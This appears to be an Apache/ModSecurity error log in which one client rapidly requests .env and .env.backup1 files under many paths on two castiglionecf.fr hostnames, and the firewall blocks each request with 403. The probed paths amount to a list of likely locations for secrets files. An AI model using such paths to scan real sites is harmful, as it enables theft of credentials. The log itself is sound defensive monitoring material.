[Mon May 11 16:26:43.511600 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:39610] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/cron/.env"] [unique_id "agHnIzJnyuKVXoStDha1IQAAAEU"]
[Mon May 11 16:26:43.511829 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:39610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/cron/.env"] [unique_id "agHnIzJnyuKVXoStDha1IQAAAEU"]
[Mon May 11 16:26:43.512345 2026] [core:error] [pid 1412074:tid 1412081] [client 18.180.54.2:39610] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:43.512524 2026] [security2:error] [pid 1412074:tid 1412081] [client 18.180.54.2:39610] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/cron/.env"] [unique_id "agHnIzJnyuKVXoStDha1IQAAAEU"]
[Mon May 11 16:26:44.130349 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:39618] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cronlab/.env"] [unique_id "agHnJPy_GXSWIKeli0vyfQAAAJE"]
[Mon May 11 16:26:44.130542 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:39618] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cronlab/.env"] [unique_id "agHnJPy_GXSWIKeli0vyfQAAAJE"]
[Mon May 11 16:26:44.131005 2026] [core:error] [pid 1411201:tid 1411263] [client 18.180.54.2:39618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:44.131152 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:39618] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cronlab/.env"] [unique_id "agHnJPy_GXSWIKeli0vyfQAAAJE"]
[Mon May 11 16:26:44.196871 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:39632] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/en/.env"] [unique_id "agHnJFV4kyjgo4bQBUhUdgAAANM"]
[Mon May 11 16:26:44.197089 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:39632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/en/.env"] [unique_id "agHnJFV4kyjgo4bQBUhUdgAAANM"]
[Mon May 11 16:26:44.197569 2026] [core:error] [pid 1416109:tid 1416149] [client 18.180.54.2:39632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:44.197718 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.180.54.2:39632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/en/.env"] [unique_id "agHnJFV4kyjgo4bQBUhUdgAAANM"]
[Mon May 11 16:26:44.871728 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:39634] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cron/.env"] [unique_id "agHnJA-Qm4vhlWBPlMi6QAAAAAk"]
[Mon May 11 16:26:44.872049 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:39634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cron/.env"] [unique_id "agHnJA-Qm4vhlWBPlMi6QAAAAAk"]
[Mon May 11 16:26:44.872855 2026] [core:error] [pid 1411099:tid 1411109] [client 18.180.54.2:39634] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:44.873066 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:39634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/cron/.env"] [unique_id "agHnJA-Qm4vhlWBPlMi6QAAAAAk"]
[Mon May 11 16:26:44.927878 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:39638] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/administrator/.env"] [unique_id "agHnJPy_GXSWIKeli0vyfgAAAIo"]
[Mon May 11 16:26:44.928058 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:39638] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/administrator/.env"] [unique_id "agHnJPy_GXSWIKeli0vyfgAAAIo"]
[Mon May 11 16:26:44.928552 2026] [core:error] [pid 1411201:tid 1411256] [client 18.180.54.2:39638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:44.928714 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:39638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/administrator/.env"] [unique_id "agHnJPy_GXSWIKeli0vyfgAAAIo"]
[Mon May 11 16:26:45.609859 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:39644] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/en/.env"] [unique_id "agHnJfy_GXSWIKeli0vyfwAAAIM"]
[Mon May 11 16:26:45.610084 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:39644] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/en/.env"] [unique_id "agHnJfy_GXSWIKeli0vyfwAAAIM"]
[Mon May 11 16:26:45.610570 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:39644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:45.610724 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:39644] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/en/.env"] [unique_id "agHnJfy_GXSWIKeli0vyfwAAAIM"]
[Mon May 11 16:26:45.633321 2026] [security2:error] [pid 1416109:tid 1416136] [client 18.180.54.2:39660] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/psnlink/.env"] [unique_id "agHnJVV4kyjgo4bQBUhUegAAAMY"]
[Mon May 11 16:26:45.633557 2026] [security2:error] [pid 1416109:tid 1416136] [client 18.180.54.2:39660] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/psnlink/.env"] [unique_id "agHnJVV4kyjgo4bQBUhUegAAAMY"]
[Mon May 11 16:26:45.634038 2026] [core:error] [pid 1416109:tid 1416136] [client 18.180.54.2:39660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:45.634217 2026] [security2:error] [pid 1416109:tid 1416136] [client 18.180.54.2:39660] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/psnlink/.env"] [unique_id "agHnJVV4kyjgo4bQBUhUegAAAMY"]
[Mon May 11 16:26:46.312112 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:39668] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/administrator/.env"] [unique_id "agHnJvy_GXSWIKeli0vygAAAAJg"]
[Mon May 11 16:26:46.312344 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:39668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/administrator/.env"] [unique_id "agHnJvy_GXSWIKeli0vygAAAAJg"]
[Mon May 11 16:26:46.312817 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:39668] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:46.312961 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:39668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/administrator/.env"] [unique_id "agHnJvy_GXSWIKeli0vygAAAAJg"]
[Mon May 11 16:26:46.317397 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:39676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/exapi/.env"] [unique_id "agHnJlV4kyjgo4bQBUhUfQAAANc"]
[Mon May 11 16:26:46.317619 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:39676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/exapi/.env"] [unique_id "agHnJlV4kyjgo4bQBUhUfQAAANc"]
[Mon May 11 16:26:46.318114 2026] [core:error] [pid 1416109:tid 1416153] [client 18.180.54.2:39676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:46.318290 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:39676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/exapi/.env"] [unique_id "agHnJlV4kyjgo4bQBUhUfQAAANc"]
[Mon May 11 16:26:47.014765 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:39700] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/sitemaps/.env"] [unique_id "agHnJ0WKUxpmnkK7zHx8NAAAAQI"]
[Mon May 11 16:26:47.014992 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:39700] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/sitemaps/.env"] [unique_id "agHnJ0WKUxpmnkK7zHx8NAAAAQI"]
[Mon May 11 16:26:47.015500 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:39700] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:47.015658 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:39700] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/sitemaps/.env"] [unique_id "agHnJ0WKUxpmnkK7zHx8NAAAAQI"]
[Mon May 11 16:26:47.025609 2026] [security2:error] [pid 1411099:tid 1411114] [client 18.180.54.2:39684] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/psnlink/.env"] [unique_id "agHnJw-Qm4vhlWBPlMi6RAAAAA4"]
[Mon May 11 16:26:47.025771 2026] [security2:error] [pid 1411099:tid 1411114] [client 18.180.54.2:39684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/psnlink/.env"] [unique_id "agHnJw-Qm4vhlWBPlMi6RAAAAA4"]
[Mon May 11 16:26:47.026274 2026] [core:error] [pid 1411099:tid 1411114] [client 18.180.54.2:39684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:47.026431 2026] [security2:error] [pid 1411099:tid 1411114] [client 18.180.54.2:39684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/psnlink/.env"] [unique_id "agHnJw-Qm4vhlWBPlMi6RAAAAA4"]
[Mon May 11 16:26:47.708097 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:39712] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.backup1"] [unique_id "agHnJ0WKUxpmnkK7zHx8NQAAARA"]
[Mon May 11 16:26:47.708362 2026] [security2:error] [pid 1411055:tid 1411073] [client 18.180.54.2:39712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.backup1"] [unique_id "agHnJ0WKUxpmnkK7zHx8NQAAARA"]
[Mon May 11 16:26:47.708880 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:39712] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
